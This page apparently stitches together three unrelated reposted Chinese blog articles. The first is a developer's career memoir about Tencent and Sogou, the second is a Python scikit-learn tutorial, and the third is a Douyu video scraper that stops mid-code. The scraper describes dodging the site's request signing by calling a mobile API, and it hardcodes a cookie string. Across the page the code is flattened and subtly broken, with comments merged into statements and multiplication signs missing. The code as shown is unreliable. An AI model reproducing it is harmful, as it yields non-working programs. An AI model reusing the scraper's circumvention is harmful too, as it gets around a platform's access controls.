...为我不仅仅只是把问题处理完了就完事，而是非得想把和它相关的周边业务逻辑都挖一遍才甘心。因此，班也没少加，好多个周末我都一个人在公司看代码，做测试。 不过这种方式的好处也是显而易见的，我花了大概一年的时间就熟悉了团队里的各种模块和业务。当有老员工离职的时候，我们领导很惆怅。我告诉他不用担心，这些模块我能顶住。有了前期看代码的积累，确实后来的各种事情处理起来都非常的得心应手。入职一年就顶起了团队里的大梁。 而且我还发现我们公司的客户端软件在启动的时候比较慢，通过主动调研和测试，最后给领导提交了一个客户端启动加速的方案。现在能想起来的方式其中一个技术方式是 DLL 的基地址重定位。 02 入职腾讯 在 2011 年下半年，工作了一年多的时候，感觉广播电视领域整体的盘子还是太小了，当时领头企业的营业额一年也就才十个亿左右。再通过和自己在腾讯的同学交流，还是觉得互联网的空间更大。所以也婉拒了领导给的副组长的提拔挽留，又毅然跳到了北京腾讯。 我是 2011 年 11 月加入腾讯的。在项目上，仍然保持和第一家公司时工作类似的风格，全力以赴。不仅仅局限于完成自己手头的工作，主动做一切可能有价值的事情。其中一件事情就是我发现在当时的项目中，存在很多运营后台的开发需求。每次开发一个后台都得有人力去投入。 后来我就在老大的所开发的一套 PHP 框架的基础上进行改进。实现了只要指定一张 Mysql 数据库中的表，就可以自动生成 bootstrap 样式的管理后台界面。支持列表展示、搜索、删除、批量删除、文本框、时间控件等等一切基础功能。再以后涉及管理后台的功能，只需要在这个基础上改造就行了，人力投入降低了很多，风格也得到了统一。这个工具现在在我们团队内部仍然还在广泛地使用。 还有个故事我也讲过，就是老大分配给我一个图片下载的任务。我不局限于完成完成任务，而且还把文件系统、磁盘工作原理都深入整理了一遍，就是这篇《Linux文件系统十问》 03 转战搜狗 2013 下半年的时候，我第一次感受到了工作岗位的震荡。我还专注解决某一个 bug，花了不少精力都还没查到 bug 的原因。这时候，部门助理突然招呼我们所有人都下楼，在银科腾讯的 Image 印象店集合。在那里，见到了腾讯的总裁 Martin。这还是第一次离大老板只有一米远的距离。 所有人都是一脸困惑，突然把大家召集下来是干嘛呢。原来就在几个小时前，腾讯总办已经和搜狗达成了协议。腾讯收购搜狗的一部分股份，并把我们连人带业务一起注入到了搜狗。 没想到，是老板用一种更牛逼的方式帮我把 bug 给解决了。 14 年 1 月正式到了搜狗以后，我们没有继续做搜索了。而是内部 Transfer 到了另外一个部门。做起了搜狗网址导航、搜狗手机助手、搜狗浏览器等业务。我也是从那个时间点，开始带团队的，也是从那以后慢慢开始从个人贡献者到带团队集体输出的角色的转变。 在搜狗工作的这 7 年的时间里，我仍然也是延续之前的风格。不拘泥于完成工作中的产品需求，以及老大交付的任务。而是主动去探索各种项目中有价值的事情。 比如在手机助手的推广中，我琢磨了新用户的安装流程的各个环节后，找出影响用户安装率提升的关键因素。然后对新版本安装包采用了多种技术方案，将单用户获取成本削减了20%+，这一年下来就是千万级别的成本节约。 我们还主动在手机助手的搜索模块中应用了简单的学习算法。采用了用户协同，标签相似，点击反馈等方法将手机助手的搜索转化率提升了数个百分点。 除了用技术提升业务以外，我还结合工作中的问题进行了很多的深度技术思考。 如有一次我们自己维护了一个线上的redis（当时工程部还没有redis平台，redis服务要业务自己维护）。为了优化性能，我把后端的请求由短连接改成了长连接。虽然看效果性能确实是优化了，但是我的思考并没有停止。我们所有的后端机都会连接这个redis。这样在这个redis实例上可能得有6000多条并发连接存在。我就开始疑惑，Linux 最多能有多少个TCP连接呢，我这 6000 条长连接会不会把这个服务器玩坏？ 再比如，我们组的服务器遭遇过几次连接相关的线上问题。其中一次是因为端口紧张而导致 CPU 消耗飙升。后来我又深入研究了一下。 最近，由于 Docker 的广泛应用。底层的网络工作方式已经在悄悄地发生变化了。所以我又开辟了一个网络虚拟化的坑，来一点一点地填。 现在我们的「开发内功修炼」公众号和 Github 就是在作为一个我和大家分享我的技术思考的一个窗口。 04 重回腾讯 时隔 7 年，我又以一种奇特的方式变回了腾讯人的身份。 腾讯再一次收购了搜狗的股份，这一次不再是控股，而是全资。 在离开腾讯的这 7 年多的时间里，腾讯的内部技术工作方式已经发生了翻天覆地的变化。 所以在刚转回腾讯的这一段时间里，我花了大量的精力来熟悉腾讯基于 tRPC 的各种技术生态。除了工作日，也投入了不少周末的精力。 05 再叨叨几句 最后，水文里挤干货，通过我今天的文章我想给大家分享这么几点经验。 第一，是要学会抬头看路，选择一个好的赛道进去。我非常庆幸我当年从广电赛道切换到了互联网，获得了更大的舞台。不过其实我自己在这点上做的也不是特别好，2013年底入职搜狗前拒绝了字节大把期权的offer，要不然我我早就财务自由了。 第二，不要光被动接收领导的指令干活。要主动积极思考项目中哪些地方是待改进的，想到了你就去做。领导都非常喜欢积极主动的员工。我自己也是喜欢招一些能主动思考，积极推进的同学。这些人能创造意外的价值。 第三，工作中除了业务以外还要主动技术的深度思考。毕竟技术仍然是开发的立命之本。在晋升考核的时候，业务数据做的再好也代替不了技术实力的核心位置。把工作中的技术点总结一下，在公司内分享出来。不涉及机密的话在外网分享一下更好。对你自己，对你的团队，都是好事。 技术交流群 最近有很多人问，有没有读者交流群，想知道怎么加入。 最近我创建了一些群，大家可以加入。交流群都是免费的，只需要大家加入之后不要随便发广告，多多交流技术就好了。 目前创建了多个交流群，全国交流群、北上广杭深等各地区交流群、面试交流群、资源共享群等。 有兴趣入群的同学，可长按扫描下方二维码，一定要备注：全国 Or 城市 Or 面试 Or 资源，根据格式备注，可更快被通过且邀请进群。 ▲长按扫描 往期推荐 武大94年博士年薪201万入职华为！学霸日程表曝光，简直降维打击！ 腾讯三面：40亿个QQ号码如何去重？ 我被开除了。。只因为看了骂公司的帖子 如果你喜欢本文, 请长按二维码，关注 Hollis. 转发至朋友圈，是对我最大的支持。 点个 在看 喜欢是一种感觉 在看是一种支持 ↘↘↘ 本篇文章为转载内容。原文链接：https://blog.csdn.net/hollis_chuang/article/details/121738393。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...据。 第6课：通过预处理数据准备建模。 第7课：使用重采样方法进行算法评估。 第8课：算法评估指标。 第9课：现场检查算法。 第10课：模型比较和选择。 第11课：通过算法调整提高准确性。 第12课：利用集合预测提高准确性。 第13课：完成并保存模型。 第14课：Hello World端到端项目。 每节课可能需要您60秒钟或最多30分钟。花点时间按照自己的进度完成课程。提出问题，甚至在以下评论中发布结果。 这些课程希望您能开始学习并做事。我会给您提示，但每节课的重点是迫使您学习从哪里寻求有关Python平台的帮助（提示，我直接在此博客上获得了所有答案，请使用搜索特征）。 在早期课程中，我确实提供了更多帮助，因为我希望您树立一些信心和惯性。 挂在那里，不要放弃！ 第1课：下载并安装Python和SciPy 您必须先访问平台才能开始使用Python进行机器学习。 今天的课程很简单，您必须在计算机上下载并安装Python 3.6平台。 访问Python主页并下载适用于您的操作系统（Linux，OS X或Windows）的Python。在计算机上安装Python。您可能需要使用特定于平台的软件包管理器，例如OS X上的macports或RedHat Linux上的yum。 您还需要安装SciPy平台和scikit-learn库。我建议使用与安装Python相同的方法。 您可以使用Anaconda一次安装所有内容（更加容易）。推荐给初学者。 通过在命令行中键入“ python”来首次启动Python。 使用以下代码检查所有您需要的版本： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Python version import sys print('Python: {}'.format(sys.version)) scipy import scipy print('scipy: {}'.format(scipy.__version__)) numpy import numpy print('numpy: {}'.format(numpy.__version__)) matplotlib import matplotlib print('matplotlib: {}'.format(matplotlib.__version__)) pandas import pandas print('pandas: {}'.format(pandas.__version__)) scikit-learn import sklearn print('sklearn: {}'.format(sklearn.__version__)) 如果有任何错误，请停止。现在该修复它们了。 需要帮忙？请参阅本教程： 如何使用Anaconda设置用于机器学习和深度学习的Python环境 第2课：深入了解Python，NumPy，Matplotlib和Pandas。 您需要能够读写基本的Python脚本。 作为开发人员，您可以很快选择新的编程语言。Python区分大小写，使用哈希（＃）进行注释，并使用空格指示代码块（空格很重要）。 今天的任务是在Python交互环境中练习Python编程语言的基本语法和重要的SciPy数据结构。 练习作业，在Python中使用列表和流程控制。 练习使用NumPy数组。 练习在Matplotlib中创建简单图。 练习使用Pandas Series和DataFrames。 例如，以下是创建Pandas DataFrame的简单示例。 1 2 3 4 5 6 7 8 dataframe import numpy import pandas myarray = numpy.array([[1, 2, 3], [4, 5, 6]]) rownames = ['a', 'b'] colnames = ['one', 'two', 'three'] mydataframe = pandas.DataFrame(myarray, index=rownames, columns=colnames) print(mydataframe) 第3课：从CSV加载数据 机器学习算法需要数据。您可以从CSV文件加载自己的数据，但是当您开始使用Python进行机器学习时，应该在标准机器学习数据集上进行练习。 今天课程的任务是让您轻松地将数据加载到Python中并查找和加载标准的机器学习数据集。 您可以在UCI机器学习存储库上下载和练习许多CSV格式的出色标准机器学习数据集。 练习使用标准库中的CSV.reader（）将CSV文件加载到Python 中。 练习使用NumPy和numpy.loadtxt（）函数加载CSV文件。 练习使用Pandas和pandas.read_csv（）函数加载CSV文件。 为了让您入门，下面是一个片段，该片段将直接从UCI机器学习存储库中使用Pandas来加载Pima Indians糖尿病数据集。 1 2 3 4 5 6 Load CSV using Pandas from URL import pandas url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] data = pandas.read_csv(url, names=names) print(data.shape) 到现在为止做得很好！等一下 到目前为止有什么问题吗？在评论中提问。 第4课：使用描述性统计数据理解数据 将数据加载到Python之后，您需要能够理解它。 您越了解数据，可以构建的模型就越精确。了解数据的第一步是使用描述性统计数据。 今天，您的课程是学习如何使用描述性统计信息来理解您的数据。我建议使用Pandas DataFrame上提供的帮助程序功能。 使用head（）函数了解您的数据以查看前几行。 使用shape属性查看数据的维度。 使用dtypes属性查看每个属性的数据类型。 使用describe（）函数查看数据的分布。 使用corr（）函数计算变量之间的成对相关性。 以下示例加载了皮马印第安人糖尿病发病数据集，并总结了每个属性的分布。 1 2 3 4 5 6 7 Statistical Summary import pandas url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] data = pandas.read_csv(url, names=names) description = data.describe() print(description) 试试看！ 第5课：通过可视化了解数据 从昨天的课程继续，您必须花一些时间更好地了解您的数据。 增进对数据理解的第二种方法是使用数据可视化技术（例如，绘图）。 今天，您的课程是学习如何在Python中使用绘图来单独理解属性及其相互作用。再次，我建议使用Pandas DataFrame上提供的帮助程序功能。 使用hist（）函数创建每个属性的直方图。 使用plot（kind ='box'）函数创建每个属性的箱须图。 使用pandas.scatter_matrix（）函数创建所有属性的成对散点图。 例如，下面的代码片段将加载糖尿病数据集并创建数据集的散点图矩阵。 1 2 3 4 5 6 7 8 9 Scatter Plot Matrix import matplotlib.pyplot as plt import pandas from pandas.plotting import scatter_matrix url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] data = pandas.read_csv(url, names=names) scatter_matrix(data) plt.show() 样本散点图矩阵 第6课：通过预处理数据准备建模 您的原始数据可能未设置为最佳建模形式。 有时您需要对数据进行预处理，以便最好地将问题的固有结构呈现给建模算法。在今天的课程中，您将使用scikit-learn提供的预处理功能。 scikit-learn库提供了两个用于转换数据的标准习语。每种变换在不同的情况下都非常有用：拟合和多重变换以及组合的拟合与变换。 您可以使用多种技术来准备数据以进行建模。例如，尝试以下一些方法 使用比例和中心选项将数值数据标准化（例如，平均值为0，标准偏差为1）。 使用范围选项将数值数据标准化（例如，范围为0-1）。 探索更高级的功能工程，例如Binarizing。 例如，下面的代码段加载了Pima Indians糖尿病发病数据集，计算了标准化数据所需的参数，然后创建了输入数据的标准化副本。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Standardize data (0 mean, 1 stdev) from sklearn.preprocessing import StandardScaler import pandas import numpy url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = pandas.read_csv(url, names=names) array = dataframe.values separate array into input and output components X = array[:,0:8] Y = array[:,8] scaler = StandardScaler().fit(X) rescaledX = scaler.transform(X) summarize transformed data numpy.set_printoptions(precision=3) print(rescaledX[0:5,:]) 第7课：使用重采样方法进行算法评估 用于训练机器学习算法的数据集称为训练数据集。用于训练算法的数据集不能用于为您提供有关新数据的模型准确性的可靠估计。这是一个大问题，因为创建模型的整个思路是对新数据进行预测。 您可以使用称为重采样方法的统计方法将训练数据集划分为子集，一些方法用于训练模型，而另一些则被保留，并用于估计看不见的数据的模型准确性。 今天课程的目标是练习使用scikit-learn中可用的不同重采样方法，例如： 将数据集分为训练集和测试集。 使用k倍交叉验证来估计算法的准确性。 使用留一法交叉验证来估计算法的准确性。 下面的代码段使用scikit-learn通过10倍交叉验证来评估Pima Indians糖尿病发作的Logistic回归算法的准确性。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Evaluate using Cross Validation from pandas import read_csv from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from sklearn.linear_model import LogisticRegression url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = read_csv(url, names=names) array = dataframe.values X = array[:,0:8] Y = array[:,8] kfold = KFold(n_splits=10, random_state=7) model = LogisticRegression(solver='liblinear') results = cross_val_score(model, X, Y, cv=kfold) print("Accuracy: %.3f%% (%.3f%%)") % (results.mean()100.0, results.std()100.0) 您获得了什么精度？在评论中让我知道。 您是否意识到这是中间点？做得好！ 第8课：算法评估指标 您可以使用许多不同的指标来评估数据集上机器学习算法的技能。 您可以通过cross_validation.cross_val_score（）函数在scikit-learn中指定用于测试工具的度量，默认值可用于回归和分类问题。今天课程的目标是练习使用scikit-learn软件包中可用的不同算法性能指标。 在分类问题上练习使用“准确性”和“ LogLoss”度量。 练习生成混淆矩阵和分类报告。 在回归问题上练习使用RMSE和RSquared指标。 下面的代码段演示了根据Pima Indians糖尿病发病数据计算LogLoss指标。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Cross Validation Classification LogLoss from pandas import read_csv from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from sklearn.linear_model import LogisticRegression url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = read_csv(url, names=names) array = dataframe.values X = array[:,0:8] Y = array[:,8] kfold = KFold(n_splits=10, random_state=7) model = LogisticRegression(solver='liblinear') scoring = 'neg_log_loss' results = cross_val_score(model, X, Y, cv=kfold, scoring=scoring) print("Logloss: %.3f (%.3f)") % (results.mean(), results.std()) 您得到了什么日志损失？在评论中让我知道。 第9课：抽查算法 您可能无法事先知道哪种算法对您的数据效果最好。 您必须使用反复试验的过程来发现它。我称之为现场检查算法。scikit-learn库提供了许多机器学习算法和工具的接口，以比较这些算法的估计准确性。 在本课程中，您必须练习抽查不同的机器学习算法。 对数据集进行抽查线性算法（例如线性回归，逻辑回归和线性判别分析）。 抽查数据集上的一些非线性算法（例如KNN，SVM和CART）。 抽查数据集上一些复杂的集成算法（例如随机森林和随机梯度增强）。 例如，下面的代码片段对Boston House Price数据集上的K最近邻居算法进行了抽查。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 KNN Regression from pandas import read_csv from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from sklearn.neighbors import KNeighborsRegressor url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/housing.data" names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV'] dataframe = read_csv(url, delim_whitespace=True, names=names) array = dataframe.values X = array[:,0:13] Y = array[:,13] kfold = KFold(n_splits=10, random_state=7) model = KNeighborsRegressor() scoring = 'neg_mean_squared_error' results = cross_val_score(model, X, Y, cv=kfold, scoring=scoring) print(results.mean()) 您得到的平方误差是什么意思？在评论中让我知道。 第10课：模型比较和选择 既然您知道了如何在数据集中检查机器学习算法，那么您需要知道如何比较不同算法的估计性能并选择最佳模型。 在今天的课程中，您将练习比较Python和scikit-learn中的机器学习算法的准确性。 在数据集上相互比较线性算法。 在数据集上相互比较非线性算法。 相互比较同一算法的不同配置。 创建比较算法的结果图。 下面的示例在皮马印第安人发病的糖尿病数据集中将Logistic回归和线性判别分析进行了比较。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Compare Algorithms from pandas import read_csv from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from sklearn.linear_model import LogisticRegression from sklearn.discriminant_analysis import LinearDiscriminantAnalysis load dataset url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = read_csv(url, names=names) array = dataframe.values X = array[:,0:8] Y = array[:,8] prepare models models = [] models.append(('LR', LogisticRegression(solver='liblinear'))) models.append(('LDA', LinearDiscriminantAnalysis())) evaluate each model in turn results = [] names = [] scoring = 'accuracy' for name, model in models: kfold = KFold(n_splits=10, random_state=7) cv_results = cross_val_score(model, X, Y, cv=kfold, scoring=scoring) results.append(cv_results) names.append(name) msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std()) print(msg) 哪种算法效果更好？你能做得更好吗？在评论中让我知道。 第11课：通过算法调整提高准确性 一旦找到一种或两种在数据集上表现良好的算法，您可能希望提高这些模型的性能。 提高算法性能的一种方法是将其参数调整为特定的数据集。 scikit-learn库提供了两种方法来搜索机器学习算法的参数组合。在今天的课程中，您的目标是练习每个。 使用您指定的网格搜索来调整算法的参数。 使用随机搜索调整算法的参数。 下面使用的代码段是一个示例，该示例使用网格搜索在Pima Indians糖尿病发病数据集上的Ridge回归算法。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Grid Search for Algorithm Tuning from pandas import read_csv import numpy from sklearn.linear_model import Ridge from sklearn.model_selection import GridSearchCV url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = read_csv(url, names=names) array = dataframe.values X = array[:,0:8] Y = array[:,8] alphas = numpy.array([1,0.1,0.01,0.001,0.0001,0]) param_grid = dict(alpha=alphas) model = Ridge() grid = GridSearchCV(estimator=model, param_grid=param_grid, cv=3) grid.fit(X, Y) print(grid.best_score_) print(grid.best_estimator_.alpha) 哪些参数取得最佳效果？你能做得更好吗？在评论中让我知道。 第12课：利用集合预测提高准确性 您可以提高模型性能的另一种方法是组合来自多个模型的预测。 一些模型提供了内置的此功能，例如用于装袋的随机森林和用于增强的随机梯度增强。可以使用另一种称为投票的合奏将来自多个不同模型的预测组合在一起。 在今天的课程中，您将练习使用合奏方法。 使用随机森林和多余树木算法练习装袋。 使用梯度增强机和AdaBoost算法练习增强合奏。 通过将来自多个模型的预测组合在一起来练习投票合奏。 下面的代码段演示了如何在Pima Indians糖尿病发病数据集上使用随机森林算法（袋装决策树集合）。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Random Forest Classification from pandas import read_csv from sklearn.model_selection import KFold from sklearn.model_selection import cross_val_score from sklearn.ensemble import RandomForestClassifier url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = read_csv(url, names=names) array = dataframe.values X = array[:,0:8] Y = array[:,8] num_trees = 100 max_features = 3 kfold = KFold(n_splits=10, random_state=7) model = RandomForestClassifier(n_estimators=num_trees, max_features=max_features) results = cross_val_score(model, X, Y, cv=kfold) print(results.mean()) 你能设计出更好的合奏吗？在评论中让我知道。 第13课：完成并保存模型 找到有关机器学习问题的良好模型后，您需要完成该模型。 在今天的课程中，您将练习与完成模型有关的任务。 练习使用模型对新数据（在训练和测试过程中看不到的数据）进行预测。 练习将经过训练的模型保存到文件中，然后再次加载。 例如，下面的代码片段显示了如何创建Logistic回归模型，将其保存到文件中，之后再加载它以及对看不见的数据进行预测。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 Save Model Using Pickle from pandas import read_csv from sklearn.model_selection import train_test_split from sklearn.linear_model import LogisticRegression import pickle url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv" names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class'] dataframe = read_csv(url, names=names) array = dataframe.values X = array[:,0:8] Y = array[:,8] test_size = 0.33 seed = 7 X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=test_size, random_state=seed) Fit the model on 33% model = LogisticRegression(solver='liblinear') model.fit(X_train, Y_train) save the model to disk filename = 'finalized_model.sav' pickle.dump(model, open(filename, 'wb')) some time later... load the model from disk loaded_model = pickle.load(open(filename, 'rb')) result = loaded_model.score(X_test, Y_test) print(result) 第14课：Hello World端到端项目 您现在知道如何完成预测建模机器学习问题的每个任务。 在今天的课程中，您需要练习将各个部分组合在一起，并通过端到端的标准机器学习数据集进行操作。 端到端遍历虹膜数据集（机器学习的世界） 这包括以下步骤： 使用描述性统计数据和可视化了解您的数据。 预处理数据以最好地揭示问题的结构。 使用您自己的测试工具抽查多种算法。 使用算法参数调整来改善结果。 使用集成方法改善结果。 最终确定模型以备将来使用。 慢慢进行，并记录结果。 您使用什么型号？您得到了什么结果？在评论中让我知道。 结束！ （看你走了多远） 你做到了。做得好！ 花一点时间，回头看看你已经走了多远。 您最初对机器学习感兴趣，并强烈希望能够使用Python练习和应用机器学习。 您可能是第一次下载，安装并启动Python，并开始熟悉该语言的语法。 在许多课程中，您逐渐地，稳定地学习了预测建模机器学习项目的标准任务如何映射到Python平台上。 基于常见机器学习任务的配方，您使用Python端到端解决了第一个机器学习问题。 使用标准模板，您所收集的食谱和经验现在可以自行解决新的和不同的预测建模机器学习问题。 不要轻描淡写，您在短时间内就取得了长足的进步。 这只是您使用Python进行机器学习的起点。继续练习和发展自己的技能。 喜欢点下关注，你的关注是我写作的最大支持 本篇文章为转载内容。原文链接：https://blog.csdn.net/m0_37337849/article/details/104016531。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...097be 批量合并处理B站视频->https://www.wandouip.com/t5i227224/ You-Get->https://you-get.org/ 思路 首先打开了PC端斗鱼视频一个链接：https://v.douyu.com/show/0Q8mMY0xXDL749Ad 发现一个参数在链接中 0Q8mMY0xXDL749Ad 通过抓包发现了一个很重要的文件：playlist.m3u8 里面包含了数个 .ts 的网络地址； .ts 文件是可以播放的视频片段； 发现 可以通过合并 .ts 片段可以得到完整视频； 出现一个问题：playlist.m3u8 怎么获取？ 发现：https://v.douyu.com/api/stream/getStreamUrl 可以获取 playlist.m3u8 文件地址； 需要POST传入一些参数才行，发现： sign 参数是一种签名，一般通过JS生成，找了半天没有方法生成 sign 参数； 通过查阅大佬文献发现：手机端的斗鱼视频有接口可以直接获取 playlist.m3u8 文件地址，成功越过 sign 签名防线； 手机端斗鱼视频链接：https://vmobile.douyu.com/show/0Q8mMY0xXDL749Ad 通过抓包发现：https://vmobile.douyu.com/video/getInfo?vid=0Q8mMY0xXDL749Ad； 这就解决了playlist.m3u8 文件获取问题：json[‘data’][‘video_url’] 第一个难题解决！！； 综上所述，整理一下具体采集流程： 获取vid = 0Q8mMY0xXDL749Ad (就是链接中的参数)； 通过 https://vmobile.douyu.com/video/getInfo?vid=0Q8mMY0xXDL749Ad 获取 playlist.m3u8 文件地址； 解析 playlist.m3u8 文件提取所有 .ts文件； 下载所有 .ts 文件； 合并 .ts 成视频文件输出； Python实现 不要开启线程池，因为会有一些问题 app.py config 中可以配置 import requestsimport reimport jsonimport timeimport pymongoimport psutilfrom hashlib import md5from moviepy.editor import from multiprocessing import Pool基本配置config = {'UID':'gKpdxKRWXwaW',用户ID'CID':104,栏目ID'TYPE':1, 1=>按用户id采集列表，2=>按栏目ID采集列表'TIME_START':1,起始时间'TIME_ENT':500,结束时间'PAGE_START':1,起始页'PAGE_END':10,结束页'TIME_GE':0,每个下载间隔时间'POOL':False,是否开启线程池'CHECKID':True, True 过滤已经下载过的视频 False 不过滤'FILE_PATH':'F:/ceshi/',下载目录，【会自动创建文件夹】'TS_PATH':'F:/ceshi/download/',缓存文件目录，【会自动创建文件夹】'DB_URL':'localhost',数据库地址'DB_NAME':'douyu',数据库名称''DB_TABLE':'douyu'数据库表}MongoDB初始化client = pymongo.MongoClient(config['DB_URL'])mango_db = client[config['DB_NAME']]MongoDB存储def save_to_mango(result):if mango_db[config['DB_TABLE']].insert_one({'vid':result}):print('成功存储到MangoDB')return Truereturn FalseMongoDB验证重复def check_to_mongo(vid):count = mango_db[config['DB_TABLE']].find({'vid':vid}).count()if count==0:return Falsereturn True删除文件def del_file(page):if os.path.exists(page): 删除文件，可使用以下两种方法。os.remove(page) os.unlink(my_file)else:print('no such file:%s' % page)循环列表删除文件def loop_del_file(arr):for item in arr:del_file(item)请求器def get_content_requests(url):headers = {}headers['user-agent']='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'headers['cookie'] = 'dy_did=07f83a57d1d2e22942e0883200001501; acf_did=07f83a57d1d2e22942e0883200001501; Hm_lvt_e99aee90ec1b2106afe7ec3b199020a7=1556514266,1557050422,1557208315; acf_auth=; acf_auth_wl=; acf_uid=; acf_nickname=; acf_username=; acf_own_room=; acf_groupid=; acf_notification=; acf_phonestatus=; _dys_lastPageCode=page_video,page_video; Hm_lpvt_e99aee90ec1b2106afe7ec3b199020a7=1557209469; _dys_refer_action_code=click_author_video_cate2'try:req_content = requests.get(url,headers = headers)if req_content.status_code == 200:return req_contentprint('请求失败：',url)return Noneexcept:print('请求失败：', url)return None把时间换算成秒def str_to_int(time):try:time_array = time.split(':')time_int = (int(time_array[0])60)+int(time_array[1])return time_intexcept:print('~~~~~计算视频时间失败~~~~~')return None提取需要采集的数据def get_list(html,type = 1):data = []try:list_json = json.loads(str(html))for om in list_json['data']['list']:gtime = str_to_int(om['video_str_duration'])if gtime > config['TIME_START'] and gtime < config['TIME_ENT']:if type == 2:data.append({'title': om['title'], 'vid': om['url'].split('show/')[1]})else:data.append({'title': om['title'], 'vid': om['hash_id']})return dataexcept:print('~~~~~数据提取失败~~~~~')return None解析playlist.m3u8def get_ts_list(m3u8):data = []try:html_m3u8_json = json.loads(m3u8)m3u8_text = get_content_requests(html_m3u8_json['data']['video_url'])m3u8_vurl =html_m3u8_json['data']['video_url'].split('playlist.m3u8?')[0]if m3u8_text:get_text = re.findall(',\n(.?).ts(.?)\n',m3u8_text.text,re.S)for item in get_text:data.append(m3u8_vurl+item[0]+'.ts'+item[1])return datareturn Noneexcept:print('~~~~~解析playlist.m3u8失败~~~~~')return None 杀死moviepy产生的特定进程def killProcess(): 处理python程序在运行中出现的异常和错误try: pids方法查看系统全部进程pids = psutil.pids()for pid in pids: Process方法查看单个进程p = psutil.Process(pid) print('pid-%s,pname-%s' % (pid, p.name())) 进程名if p.name() == 'ffmpeg-win64-v4.1.exe': 关闭任务 /f是强制执行，/im对应程序名cmd = 'taskkill /f /im ffmpeg-win64-v4.1.exe 2>nul 1>null' python调用Shell脚本执行cmd命令os.system(cmd)except:pass下载.ts文件def download_ts(m3u8_list,name):try:if not os.path.exists(config['FILE_PATH']):os.makedirs(config['FILE_PATH'])if not os.path.exists(config['TS_PATH']):os.makedirs(config['TS_PATH'])if os.path.exists(config['FILE_PATH']+name+'.mp4'):name = name+'_'+str(int(time.time()))print('开始下载：',name)L = []R = []for p in m3u8_list:ts_find = get_content_requests(p)file_ts = '{0}{1}.ts'.format(config['TS_PATH'],md5(ts_find.content).hexdigest())with open(file_ts,'wb') as f:f.write(ts_find.content)R.append(file_ts)hebing = VideoFileClip(file_ts)L.append(hebing)killProcess()print('下载完成：',file_ts)mp4file = '{0}{1}.mp4'.format(config['FILE_PATH'],name)final_clip = concatenate_videoclips(L)final_clip.to_videofile(mp4file, fps=24, remove_temp=True)killProcess()loop_del_file(R)print('\n下载完成：',name)print('')return Trueexcept:print('~~~~~合成.ts文件失败~~~~~')return None下载视频列表def list_get_kong(list_json):for item in list_json:y = Trueif config['CHECKID']:if check_to_mongo(item['vid']):print('~~~~~检测到重复项~~~~~')y = Falseif y:get_show_html = get_content_requests('https://vmobile.douyu.com/video/getInfo?vid=' + item['vid'])if get_show_html:m3u8_list = get_ts_list(get_show_html.text)if m3u8_list:download = download_ts(m3u8_list, item['title'])if download: save_to_mango(item['vid'])time.sleep(config['TIME_GE'])控制器def main(page):if config['TYPE']==1:print('~~~~~按用户ID采集~~~~~')listurl = 